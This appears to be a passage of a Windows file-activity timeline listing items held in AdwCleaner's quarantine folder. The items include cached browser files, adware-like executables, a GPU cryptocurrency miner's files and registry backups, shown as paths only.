         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -0.9s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -0.9s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -0.9s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -0.9s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -0.9s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -0.9s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -0.9s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -0.9s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -0.9s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.8s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.8s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.8s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.8s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.8s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.8s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.8s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.8s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.8s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.8s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.8s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.6s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.5s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.5s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.4s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.4s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.3s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.2s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.2s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.1s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.1s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.1s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.1s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.1s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.0s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.0s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
          0.0s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
          0.0s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.1s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.3s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.3s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.3s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.3s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.3s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.3s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.3s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.3s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.3s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.3s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.3s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.3s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.3s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.3s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.4s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.4s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.4s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.4s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.4s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.4s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.5s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.5s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.5s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.6s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.6s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.6s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.6s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.6s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.6s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.7s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.7s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.7s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.7s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.8s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.8s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.8s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.9s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.9s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.9s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.9s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          1.0s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          1.0s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          1.0s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          1.0s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          1.1s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.1s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.1s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.1s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.2s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.2s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.2s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.2s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.2s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.3s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.5s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
